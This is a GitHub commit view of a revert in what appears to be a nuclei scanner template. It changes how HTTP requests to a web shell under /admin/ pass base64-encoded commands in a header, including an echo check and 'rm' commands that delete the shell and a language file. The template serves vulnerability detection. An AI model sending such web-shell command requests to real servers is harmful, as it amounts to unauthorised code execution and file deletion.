Merge pull request #13817 from projectdiscovery/revert-13811-ISSUE-13704

Revert "[ENHANCEMENT] Removing character §"
This commit is contained in:
Ritik Chaddha
2025-11-06 11:23:32 +05:30
committed by GitHub

View File

@@ -108,7 +108,7 @@ http:
GET /admin/{{websh-file}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
C: {{base64('{{echo-cmd}}')}}
C: {{base64(echo-cmd)}}
matchers-condition: and
matchers:
@@ -125,7 +125,7 @@ http:
GET /admin/{{websh-file}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
C: {{base64('rm {{lang_file_location}}')}}
C: {{base64('rm ' + lang_file_location)}}
matchers:
- type: status
@@ -137,10 +137,9 @@ http:
GET /admin/{{websh-file}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
C: {{base64('rm {{websh-file}}')}}
C: {{base64('rm ' + websh-file)}}
matchers:
- type: status
status:
- 200
# digest: 4a0a00473045022100e71657bb25823aed111e9eda501448c94b21e5cf592f62cb51eac952d8f48ecf0220348ba5b97cb8a44577ce8ec744e61d0f101f91fb0edf9ba21fd26d2a6ea0ff4b:922c64590222798bb761d5b6d8e72950
- 200